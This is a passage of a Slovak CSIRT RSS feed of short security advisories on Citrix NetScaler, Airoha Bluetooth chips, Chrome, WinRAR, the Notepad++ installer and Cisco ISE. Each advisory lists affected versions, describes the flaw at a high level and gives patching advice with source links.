<p>Zraniteľnosť pretečenia pamäte, ktorá vedie k neúmyselnému presmerovaniu riadenia a k narušeniu dostupnosti služby, pokiaľ je zraniteľné zariadenie nakonfigurované ako Gateway (VPN virtual server, ICA Proxy, CVPN, RDP Proxy) alebo virtuálny server AAA. Spoločnosť zámerne neuvádza bližšie informácie.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Nedostupnosť služby (DoS)</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Cloud Software Group, ktorej súčasťou je aj Citrix Systems, odporúča okamžitý update na relevatnú verziu:</p>



<ul>
<li>NetScaler ADC a NetScaler Gateway 14.1-47.46 a neskoršie verzie</li>



<li>NetScaler ADC a NetScaler Gateway 13.1-59.19 a neskoršie verzie 13.1</li>



<li>NetScaler ADC 13.1-FIPS a 13.1-NDcPP 13.1-37.236 a neskoršie verzie 13.1-FIPS a 13.1-NDcPP</li>
</ul>



<p>Ak pre dané zariadenie nie je teraz žiadna aktualizácia dostupná, výrobca odporúča nepoužívať ho.</p>



<p>Pozn.: Spoločnosť Citrix Systems v&nbsp;neskoršom prehlásení však upozorňuje, že užívateľom, ktorí aktualizujú svoj softvér na verzie 14.1-47.46 alebo 13.1-59.19, môžu nastať problémy s&nbsp;autentifikáciou. Prejavujú sa formou nefunkčnej prihlasovaciej stránky, najmä pri využívaní autentifikátorov ako DUO alebo SAML. Na odstránenie tohto problému ponúka návod na odkaze: <a href="https://support.citrix.com/support-home/kbsearch/article?articleNumber=CTX694826">https://support.citrix.com/support-home/kbsearch/article?articleNumber=CTX694826</a></p>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://support.citrix.com/support-home/kbsearch/article?articleNumber=CTX694788">https://support.citrix.com/support-home/kbsearch/article?articleNumber=CTX694788</a></li>



<li><a href="https://www.cve.org/CVERecord?id=CVE-2025-6543">https://www.cve.org/CVERecord?id=CVE-2025-6543</a></li>



<li><a href="https://support.citrix.com/support-home/kbsearch/article?articleNumber=CTX694826">https://support.citrix.com/support-home/kbsearch/article?articleNumber=CTX694826</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/2515/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Zraniteľnosť protokolu Bluetooth</title>
		<link>/posts/2511</link>
					<comments>/posts/2511#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Fri, 04 Jul 2025 12:19:15 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[Bluetooth]]></category>
		<category><![CDATA[Bypassing security features]]></category>
		<guid isPermaLink="false">/?p=2511</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2025/07/bluetooth-1024x683.jpg" alt="" /></p>Zariadenia Bluetooth, ktoré obsahujú systémy na čipe (SoCs) od spoločnosti Airoha obsahujú zraniteľnosť, ktorá umožňuje čítanie a zápis do pamäte...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2025/07/bluetooth-1024x683.jpg" alt="" /></p>
<p><strong>Zariadenia Bluetooth, ktoré obsahujú systémy na čipe<em> (SoCs) </em>od spoločnosti Airoha obsahujú zraniteľnosť, ktorá umožňuje čítanie a zápis do pamäte RAM a flash pamäte. Chýbajúca autentifikácia pri moduloch Bluetooth BR/EDR umožňuje útočníkovi komunikovať so zraniteľným zariadením bez párovania so zariadením.&nbsp;</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>Beyerdynamic Amiron 300</li>



<li>Bose QuietComfort Earbuds</li>



<li>EarisMax Bluetooth Auracast Sender</li>



<li>Jabra Elite 8 Active</li>



<li>JBL Endurance Race 2</li>



<li>JBL Live Buds 3</li>



<li>Jlab Epic Air Sport ANC</li>



<li>Marshall ACTON III</li>



<li>Marshall MAJOR V</li>



<li>Marshall MINOR IV</li>



<li>Marshall MOTIF II</li>



<li>Marshall STANMORE III</li>



<li>Marshall WOBURN III</li>



<li>MoerLabs EchoBeatz</li>



<li>Sony CH-720N</li>



<li>Sony Link Buds S</li>



<li>Sony ULT Wear</li>



<li>Sony WF-1000XM3</li>



<li>Sony WF-1000XM4</li>



<li>Sony WF-1000XM5</li>



<li>Sony WF-C500</li>



<li>Sony WF-C510-GFP</li>



<li>Sony WH-1000XM4</li>



<li>Sony WH-1000XM5</li>



<li>Sony WH-1000XM6</li>



<li>Sony WH-CH520</li>



<li>Sony WH-XB910N</li>



<li>Sony WI-C100</li>



<li>Teufel Tatws2</li>
</ul>



<p><strong>Opis zraniteľností:</strong></p>



<p><strong>CVE-2025-20700 </strong>(CVSS skóre: 6.7)</p>



<ul>
<li>Chýbajúca autentifikácia pre GATT.</li>
</ul>



<p><strong>CVE-2025-20701 </strong>(CVSS skóre: 6.7)</p>



<ul>
<li>Chýbajúca autentifikácia pre Bluetooth BR/EDR.</li>
</ul>



<p><strong>CVE-2025-20702 </strong>(CVSS skóre: 7.5)</p>



<ul>
<li>Nedostatočné obmedzenie oprávnení vlastného protokolu.</li>
</ul>



<p>Pokiaľ by boli zneužité všetky tri zraniteľnosti spolu, útočník môže prevziať kontrolu nad spojením medzi mobilným telefónom a audio Bluetooth zariadením a využiť Bluetooth profil Hands-Free (HFP) na odosielanie príkazov do telefónu. Ďalej môže odpočúvať konverzácie a&nbsp;zvuky v&nbsp;dosahu mikrofónu telefónu. Potenciálne hrozí aj možnosť prepísania firmvéru zraniteľného zariadenia, čo môže viesť k vzdialenému vykonaniu škodlivého kódu.</p>



<p>Bezpečnostný výskumníci však upozorňujú, že praktické možnosti implementácie týchto zraniteľností na útok sú obmedzené. Skutočný útok by zahŕňal aj mnoho prekážok ako napríklad obmedzený dosah signálu Bluetooth, ktorý je pri ideálnych podmienkach cca 10 metrov.</p>



<p>Pozn.: Zraniteľnosť objavili bezpečnostní výskumníci z&nbsp;nemeckej spoločnosti ERNW.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong></strong><strong>Obídenie bezpečnostného prvku</strong><strong></strong></li>



<li><strong>Neoprávnený prístup k&nbsp;citlivým údajom</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Užívateľom odporúčame aktualizovať firmvér zraniteľných zariadení . Pokiaľ sa počas používania skokovo stráca signál Bluetooth, odporúčame reštartovať zariadenie a&nbsp;počkať na spätné automatické pripojenie.</p>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://insinuator.net/2025/06/airoha-bluetooth-security-vulnerabilities/">https://insinuator.net/2025/06/airoha-bluetooth-security-vulnerabilities/</a></li>



<li><a href="https://www.malwarebytes.com/blog/news/2025/07/bluetooth-vulnerability-in-audio-devices-can-be-exploited-to-spy-on-users">https://www.malwarebytes.com/blog/news/2025/07/bluetooth-vulnerability-in-audio-devices-can-be-exploited-to-spy-on-users</a></li>



<li><a href="https://www.bleepingcomputer.com/news/security/bluetooth-flaws-could-let-hackers-spy-through-your-microphone/">https://www.bleepingcomputer.com/news/security/bluetooth-flaws-could-let-hackers-spy-through-your-microphone/</a></li>



<li><a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-20700">https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-20700</a></li>



<li><a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-20701">https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-20701</a></li>



<li><a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-20702">https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-20702</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/2511/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Mesačný prehľad kritických zraniteľností jún 2025</title>
		<link>/posts/2503</link>
					<comments>/posts/2503#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Fri, 04 Jul 2025 08:02:34 +0000</pubDate>
				<category><![CDATA[Aktuality]]></category>
		<category><![CDATA[Tlačová správa]]></category>
		<category><![CDATA[monthly report]]></category>
		<category><![CDATA[VJCSIRT]]></category>
		<guid isPermaLink="false">/?p=2503</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/01/charts-1.jpg" alt="" /></p>Na našej web stránke boli doplnené informácie o závažných bezpečnostných udalostiach a zraniteľnostiach informačných systémov zaznamenaných v mesiaci jún 2025....]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/01/charts-1.jpg" alt="" /></p>
<p>Na našej web stránke boli doplnené informácie o závažných bezpečnostných udalostiach a zraniteľnostiach informačných systémov zaznamenaných v mesiaci jún 2025.</p>



<p><a href="https://csirt.sk/wp-content/uploads/2025/07/2025_06_mesacnik.pdf" data-type="link" data-id="/wp-content/uploads/2024/12/2024_11_mesacnik.pdf">Mesačný prehľad – 06/2025 PDF (557 kB)</a></p>



<p>Prehľady sú spracovávané od októbra 2014 a sú dostupné na <a href="https://csirt.sk/mesacny-prehlad-kritickych-a-zavaznych-softver">tomto odkaze</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>/posts/2503/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Aktívne zneužívaná zraniteľnosť Google Chrome</title>
		<link>/posts/2494</link>
					<comments>/posts/2494#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Wed, 02 Jul 2025 13:52:41 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[Chrome]]></category>
		<category><![CDATA[DoS]]></category>
		<category><![CDATA[RCE]]></category>
		<guid isPermaLink="false">/?p=2494</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/01/google-chrome-cropped.png" alt="" /></p>Vývojári spoločnosti Google opravili vysoko závažnú aktívne zneužívanú zraniteľnosť v&#160;prehliadači Chrome, ktorá umožňuje spôsobiť pád aplikácie alebo získať schopnosť vykonávať...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/01/google-chrome-cropped.png" alt="" /></p>
<p><strong>Vývojári spoločnosti Google opravili vysoko závažnú aktívne zneužívanú zraniteľnosť v&nbsp;prehliadači Chrome, ktorá umožňuje spôsobiť pád aplikácie alebo získať schopnosť vykonávať ľubovoľný kód.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>Google Chrome, verzie staršie ako 138.0.7204.96/.97 (Windows), 138.0.7204.92/.93 (Mac) a 138.0.7204.92 (Linux)</li>
</ul>



<p><strong>Opis činnosti:</strong></p>



<p><strong>CVE-2025-6554</strong> (CVSS 3.1 skóre 8,1)</p>



<p>Spoločnosť Google opravila vysoko závažnú zraniteľnosť v prehliadači Chrome, ktorá umožňuje vzdialenému neautentifikovanému útočníkovi<strong> čítať a zapisovať mimo povolené hodnoty v pamäti</strong>, čo môže viesť k pádu aplikácie alebo schopnosti <strong>vykonávať ľubovoľný kód.</strong></p>



<p>Zraniteľnosť súvisiaca so <strong>zámenou typu premennej </strong>sa nachádza v komponente <strong>V8</strong>. Pre jej zneužitie potrebuje útočník presvedčiť obeť, aby navštívila špeciálne vytvorenú webstránku.</p>



<p><strong>Zraniteľnosť je aktívne zneužívaná. </strong>Objavil ju Clément Lecigne z tímu Google Threat Analysis Group (TAG).</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Vykonávanie ľubovoľného kódu</strong></li>



<li><strong>Nedostupnosť služby (DoS)</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Bezodkladná aktualizácia Google Chrome aspoň na verziu 138.0.7204.96/.97 (Windows), 138.0.7204.92/.93 (Mac) a 138.0.7204.92 (Linux).</p>



<p><strong>Odkazy:</strong></p>



<ul>
<li><a href="https://chromereleases.googleblog.com/2025/06/stable-channel-update-for-desktop_30.html">https://chromereleases.googleblog.com/2025/06/stable-channel-update-for-desktop_30.html</a></li>



<li><a href="https://www.bleepingcomputer.com/news/security/google-fixes-fourth-actively-exploited-chrome-zero-day-of-2025/">https://www.bleepingcomputer.com/news/security/google-fixes-fourth-actively-exploited-chrome-zero-day-of-2025/</a></li>



<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-6554">https://nvd.nist.gov/vuln/detail/CVE-2025-6554</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/2494/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Zraniteľnosť vo WinRAR umožňuje vzdialené vykonanie kódu</title>
		<link>/posts/2491</link>
					<comments>/posts/2491#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Mon, 30 Jun 2025 13:17:13 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[RCE]]></category>
		<category><![CDATA[WinRAR]]></category>
		<guid isPermaLink="false">/?p=2491</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2025/06/winrar.png" alt="" /></p>Spoločnosť RARLAB vydala bezpečnostné aktualizácie svojho komprimačného nástroja WinRAR, ktoré opravujú vysoko závažnú zraniteľnosť verzií pre Windows. CVE-2025-6218 by vzdialený...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2025/06/winrar.png" alt="" /></p>
<p><strong>Spoločnosť RARLAB vydala bezpečnostné aktualizácie svojho komprimačného nástroja WinRAR, ktoré opravujú vysoko závažnú zraniteľnosť verzií pre Windows. CVE-2025-6218 by vzdialený neautentifikovaný útočník mohol zneužiť na vzdialené vykonanie kódu.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>WinRAR pre Windows vo verziách 7.11 a starších</li>
</ul>



<p><strong>Opis zraniteľnosti:</strong></p>



<p><strong>CVE-2025-6218 </strong>(CVSS skóre 7,8)</p>



<p>Zraniteľnosť spočíva v&nbsp;chybnom spôsobe vyhodnocovania súborových ciest v&nbsp;rámci archívov. Vzdialený neautentifikovaný útočník by ju podvrhnutím špeciálne vytvorených súborov mohol zneužiť na <strong>vzdialené vykonanie kódu</strong> v&nbsp;kontexte prihláseného používateľa. Rozbaľovaním archívov možno škodlivé súbory umiestniť do rôznych priečinkov na súborovom systéme, ako je napr. Windows Startup, ktorý obsahuje súbory spúšťané pri štarte systému.</p>



<p><strong>Zneužitie zraniteľnosti vyžaduje interakciu zo strany používateľa</strong>, ktorý musí navštíviť škodlivú webovú stránku alebo otvoriť škodlivý súbor.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Vzdialené vykonanie kódu</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Administrátorom a&nbsp;používateľom odporúčame vykonať aktualizáciu WinRAR na verziu 7.12.</p>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://www.win-rar.com/singlenewsview.html?&amp;tx_ttnews%5Btt_news%5D=276&amp;cHash=388885bd3908a40726f535c026f94eb6">https://www.win-rar.com/singlenewsview.html?&amp;tx_ttnews%5Btt_news%5D=276&amp;cHash=388885bd3908a40726f535c026f94eb6</a></li>



<li><a href="https://www.zerodayinitiative.com/advisories/ZDI-25-409/">https://www.zerodayinitiative.com/advisories/ZDI-25-409/</a></li>



<li><a href="https://www.helpnetsecurity.com/2025/06/24/high-risk-winrar-rce-flaw-patched-update-quickly-cve-2025-6218/">https://www.helpnetsecurity.com/2025/06/24/high-risk-winrar-rce-flaw-patched-update-quickly-cve-2025-6218/</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/2491/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Zraniteľnosť v inštalátore Notepad++ možno zneužiť na eskaláciu privilégií</title>
		<link>/posts/2488</link>
					<comments>/posts/2488#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Mon, 30 Jun 2025 13:14:59 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[Notepad++]]></category>
		<category><![CDATA[Privilege-escalation]]></category>
		<category><![CDATA[RCE]]></category>
		<guid isPermaLink="false">/?p=2488</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2025/06/notepad.webp" alt="" /></p>Vývojári populárneho textového editora Notepad++ vydali bezpečnostné aktualizácie, ktoré opravujú vysoko závažnú zraniteľnosť v jeho inštalátore. CVE-2025-49144 možno lokálne zneužiť...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2025/06/notepad.webp" alt="" /></p>
<p><strong>Vývojári populárneho textového editora Notepad++ vydali bezpečnostné aktualizácie, ktoré opravujú vysoko závažnú zraniteľnosť v jeho inštalátore. CVE-2025-49144 možno lokálne zneužiť na eskaláciu privilégií na úroveň SYSTEM a&nbsp;vykonanie kódu.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>Inštalátor Notepad++ vo verzii 8.8.1 a starších</li>
</ul>



<p><strong>Pozn.: Zraniteľné sú len inštalátory aplikácie a&nbsp;nie samotný textový editor.</strong></p>



<p><strong>Opis zraniteľnosti:</strong></p>



<p><strong>CVE-2025-49144 </strong>(CVSS skóre 7,3)</p>



<p>Vysoko závažnú zraniteľnosť s&nbsp;identifikátorom CVE-2025-49144 by lokálny autentifikovaný útočník mohol zneužiť na <strong>eskaláciu privilégií</strong> a&nbsp;<strong>vykonanie kódu s&nbsp;oprávneniami úrovne SYSTEM</strong>.</p>



<p><strong>Vzdialené zneužitie zraniteľnosti je možné s interakciou používateľa</strong>, ktorého útočník presvedčí, aby stiahol zraniteľnú verziu inštalátora a&nbsp;škodlivý spustiteľný súbor do rovnakého priečinka a&nbsp;následne spustil inštalátor.</p>



<p>Na uvedenú zraniteľnosť je v&nbsp;súčasnosti <strong>dostupný tzv. </strong><strong>Proof-of-Concept kód</strong> demonštrujúci spôsob jej zneužitia.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Eskalácia privilégií</strong></li>



<li><strong>Vykonanie kódu</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Administrátorom a&nbsp;používateľom odporúčame vykonať aktualizáciu Notepad++ na verziu 8.8.2.</p>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://www.cve.org/CVERecord?id=CVE-2025-49144">https://www.cve.org/CVERecord?id=CVE-2025-49144</a></li>



<li><a href="https://www.helpnetsecurity.com/2025/06/25/flaw-in-notepad-installer-could-grant-attackers-system-access-cve-2025-49144/">https://www.helpnetsecurity.com/2025/06/25/flaw-in-notepad-installer-could-grant-attackers-system-access-cve-2025-49144/</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/2488/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Kritické zraniteľnosti v Cisco ISE a ISE-PIC umožňujú vzdialené vykonanie príkazov</title>
		<link>/posts/2486</link>
					<comments>/posts/2486#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Mon, 30 Jun 2025 13:12:56 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[Cisco]]></category>
		<category><![CDATA[Privilege-escalation]]></category>
		<category><![CDATA[RCE]]></category>
		<guid isPermaLink="false">/?p=2486</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/02/cisco-cropped-1024x768.png" alt="" /></p>Spoločnosť Cisco vydala bezpečnostné aktualizácie pre produkty Cisco Identity Services Engine (ISE) and Cisco ISE Passive Identity Connector (ISE-PIC), ktoré...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/02/cisco-cropped-1024x768.png" alt="" /></p>
<p><strong>Spoločnosť Cisco vydala bezpečnostné aktualizácie pre produkty Cisco Identity Services Engine (ISE) and Cisco ISE Passive Identity Connector (ISE-PIC), ktoré opravujú tri kritické bezpečnostné zraniteľnosti. CVE-2025-20337</strong>, <strong>CVE-2025-20281 a CVE-2025-20282 by útočník mohol zneužiť na vzdialené vykonanie kódu v mene používateľa root a získanie úplnej kontroly nad systémom.</strong><br><strong>[Aktualizované 29.7.2025] </strong><br><strong><em>CISA zaradila všetky tri zraniteľnosti do  zoznamu aktívne zneužívaných 28.7.2025.</em></strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>Cisco ISE a ISE-PIC 3.3 bez inštalovanej záplaty Patch 7</li>



<li>Cisco ISE a ISE-PIC 3.4 bez inštalovanej záplaty Patch 2</li>
</ul>



<p><strong>Opis zraniteľnosti:</strong></p>



<p><strong>CVE-2025-20281 </strong>a <strong>CVE-2025-20337</strong> (CVSS skóre 10,0)</p>



<p>Kritické zraniteľnosti spočívajú v&nbsp;nedostatočnom overovaní používateľských vstupov v rámci bližšie nešpecifikovaného ISE API rozhrania. Vzdialený neautentifikovaný útočník by ju zaslaním špeciálne vytvorených API požiadaviek mohol zneužiť na <strong>získanie privilégií používateľa root</strong> a&nbsp;<strong>vzdialené vykonanie príkazov operačného systému</strong> zariadenia.</p>



<p><strong>CVE-2025-20282 </strong>(CVSS skóre 10,0)</p>



<p>CVE-2025-2028 spočíva v&nbsp;absencii overovania nahrávaných súborov, čo možno zneužiť na ich <strong>nahratie</strong><strong> do privilegovaných priečinkov na súborovom systéme</strong> zariadenia. Tak môže útočník získať možnosť <strong>eskalácie privilégií na úroveň používateľa root</strong> a&nbsp;<strong>vzdialene vykonávať kód</strong>.</p>



<p>Spoločnosť Cisco <strong>zaznamenala</strong> v júli 2025 prvé <strong>pokusy o zneužitie</strong> vyššie uvedených zraniteľností.</p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Eskalácia privilégií</strong></li>



<li><strong>Vzdialené vykonanie kódu</strong></li>



<li><strong>Získanie úplnej kontroly nad systémom</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Administrátorom Cisco Identity Services Engine (ISE) and Cisco ISE Passive Identity Connector odporúčame bezodkladnú inštaláciu záplat Patch 7 pre verziu 3.3 a Patch 2 pre verziu 3.4.</p>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ise-unauth-rce-ZAd2GnJ6">https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ise-unauth-rce-ZAd2GnJ6</a></li>



<li><a href="https://thehackernews.com/2025/06/critical-rce-flaws-in-cisco-ise-and-ise.html">https://thehackernews.com/2025/06/critical-rce-flaws-in-cisco-ise-and-ise.html</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/2486/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Kritické zraniteľnosti v Citrix NetScaler ADC a NetScaler Gateway</title>
		<link>/posts/2482</link>
					<comments>/posts/2482#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Tue, 24 Jun 2025 14:42:42 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[Citrix]]></category>
		<category><![CDATA[information disclosure]]></category>
		<category><![CDATA[NetScaler]]></category>
		<guid isPermaLink="false">/?p=2482</guid>

					<description><![CDATA[<p><img src="/wp-content/uploads/2024/07/citrix-logo.png" alt="" /></p>Spoločnosť Citrix vydala bezpečnostné aktualizácie na svoje produkty NetScaler ADC a NetScaler Gateway, ktoré opravujú 2 zraniteľnosti, z ktorých 1 je označená...]]></description>
										<content:encoded><![CDATA[<p><img src="/wp-content/uploads/2024/07/citrix-logo.png" alt="" /></p>
<p><strong>Spoločnosť Citrix vydala bezpečnostné aktualizácie na svoje produkty NetScaler ADC a NetScaler Gateway, ktoré opravujú 2 zraniteľnosti, z ktorých 1 je označená ako kritická. Aktívne zneužívanú CVE-2025-5777 možno zneužiť na získanie neoprávneného prístupu k citlivým údajom a získanie úplnej kontroly nad systémom.</strong></p>



<p><strong>Zraniteľné systémy:</strong></p>



<ul>
<li>NetScaler ADC a NetScaler Gateway 14.1 vo verziách starších ako 14.1-43.56</li>



<li>NetScaler ADC a NetScaler Gateway 13.1 vo verziách starších ako 13.1-58.32</li>



<li>NetScaler ADC 13.1-FIPS a NDcPP&nbsp;vo verziách starších ako 13.1-37.235-FIPS a NDcPP</li>



<li>NetScaler ADC 12.1-FIPS vo verziách starších ako 12.1-55.328-FIPS</li>
</ul>



<p><strong>Pozn.: Produkty NetScaler ADC a NetScaler Gateway vo verziách 12.1-X a 13.0-X už nie sú podporované a výrobca odporúča bezodkladnú aktualizáciu na verzie s&nbsp;platnou podporou.</strong></p>



<p><strong>Opis zraniteľnosti:</strong></p>



<p><strong>CVE-2025-5777 </strong>(CVSS 4.0 skóre 9,3)</p>



<p>Kritická zraniteľnosť s&nbsp;identifikátorom CVE-2025-5777 a názvom „Citrix Bleed 2“ spočíva v&nbsp;nedostatočnom overovaní vstupov, ktoré umožňuje čítanie pamäte mimo povolených hodnôt. Vzdialený neautentifikovaný útočník by ju mohol zneužiť na <strong>získanie neoprávneného prístupu k&nbsp;citlivým údajom</strong> (prihlasovacie údaje a konfigurácia) a <strong>obídeniu MFA</strong>.</p>



<p><strong>Pozn.: Zraniteľnosť možno zneužiť len v&nbsp;prípade, že je NetScaler prevádzkovaný ako Gateway (VPN virtual server, ICA Proxy, CVPN, RDP Proxy) alebo virtuálny AAA (Authentication, Authorization, and Accounting) server.</strong></p>



<p><strong>Pozn.2: Spoločnosť ReliaQuest disponuje indíciami, že zraniteľnosť je aktívne zneužívaná.</strong></p>



<p><strong>CVE-2025-5349 </strong>(CVSS 4.0 skóre 8,7)</p>



<p>Vysoko závažná zraniteľnosť CVE-2025-5349 spočíva v&nbsp;nesprávnom riadení prístupov v rámci NetScaler Management Interface a&nbsp;útočník nachádzajúci sa v&nbsp;rovnakom sieťovom segmente by ju mohol zneužiť na <strong>získanie neoprávneného prístupu do systému</strong>.</p>



<p><strong>Pozn.: Úspešné zneužitie zraniteľnosti vyžaduje prístup k&nbsp;NSIP, Cluster Management IP alebo lokálnej GSLB Site IP.</strong></p>



<p><strong>Možné škody:</strong></p>



<ul>
<li><strong>Neoprávnený prístup k&nbsp;citlivým údajom</strong></li>



<li><strong>Neoprávnený prístup do systému</strong></li>



<li><strong>Získanie úplnej kontroly nad systémom</strong></li>
</ul>



<p><strong>Odporúčania:</strong></p>



<p>Administrátorom odporúčame vykonať bezodkladnú aktualizáciu zasiahnutých systémov na verzie špecifikované výrobcom, ktoré môžete nájsť v&nbsp;časti Zraniteľné systémy alebo na <a href="https://support.citrix.com/support-home/kbsearch/article?articleNumber=CTX693420&amp;articleURL=NetScaler_ADC_and_NetScaler_Gateway_Security_Bulletin_for_CVE_2025_5349_and_CVE_2025_5777">stránke výrobcu</a>. Výrobca po aktualizácii všetkých NetScaler prevádzkovaných v&nbsp;HA pári alebo klastri odporúča ukončiť všetky aktívne ICA a&nbsp;PCoIP relácie prostredníctvom nasledujúcich príkazov:</p>



<ul>
<li><strong>kill icaconnection -all</strong></li>



<li><strong>kill pcoipConnection -all</strong></li>
</ul>



<p>[Aktualizácia 18.7.2025] Pre kontrolu prítomnosti indikátorov kompromitácie vo Vašom systéme môžete použiť aktualizovaný zoznam <a href="https://viz.greynoise.io/tags/citrixbleed-2-cve-2025-5777-attempt?days=1" data-type="link" data-id="https://viz.greynoise.io/tags/citrixbleed-2-cve-2025-5777-attempt?days=1">spoločnoti Greynoise</a>, ktorý je dostupný po prihlásení.</p>



<p><strong>Zdroje:</strong></p>



<ul>
<li><a href="https://support.citrix.com/support-home/kbsearch/article?articleNumber=CTX693420&amp;articleURL=NetScaler_ADC_and_NetScaler_Gateway_Security_Bulletin_for_CVE_2025_5349_and_CVE_2025_5777">https://support.citrix.com/support-home/kbsearch/article?articleNumber=CTX693420&amp;articleURL=NetScaler_ADC_and_NetScaler_Gateway_Security_Bulletin_for_CVE_2025_5349_and_CVE_2025_5777</a></li>



<li><a href="https://www.wiz.io/vulnerability-database/cve/cve-2025-5777">https://www.wiz.io/vulnerability-database/cve/cve-2025-5777</a></li>



<li><a href="https://www.wiz.io/vulnerability-database/cve/cve-2025-5349">https://www.wiz.io/vulnerability-database/cve/cve-2025-5349</a></li>



<li><a href="https://www.securityweek.com/critical-vulnerability-patched-in-citrix-netscaler/">https://www.securityweek.com/critical-vulnerability-patched-in-citrix-netscaler/</a></li>



<li><a href="https://reliaquest.com/blog/threat-spotlight-citrix-bleed-2-vulnerability-in-netscaler-adc-gateway-devices/">https://reliaquest.com/blog/threat-spotlight-citrix-bleed-2-vulnerability-in-netscaler-adc-gateway-devices/</a></li>
</ul>
]]></content:encoded>
					
					<wfw:commentRss>/posts/2482/feed</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Kritická zraniteľnosť v produkte Veeam Backup &#038; Replication</title>
		<link>/posts/2480</link>
					<comments>/posts/2480#respond</comments>
		
		<dc:creator><![CDATA[Marian Danko]]></dc:creator>
		<pubDate>Tue, 24 Jun 2025 14:41:31 +0000</pubDate>
				<category><![CDATA[Oznámenia a varovania]]></category>
		<category><![CDATA[Varovanie]]></category>
		<category><![CDATA[RCE]]></category>
		<category><![CDATA[Veeam]]></category>
		<guid isPermaLink="false">/?p=2480</guid>

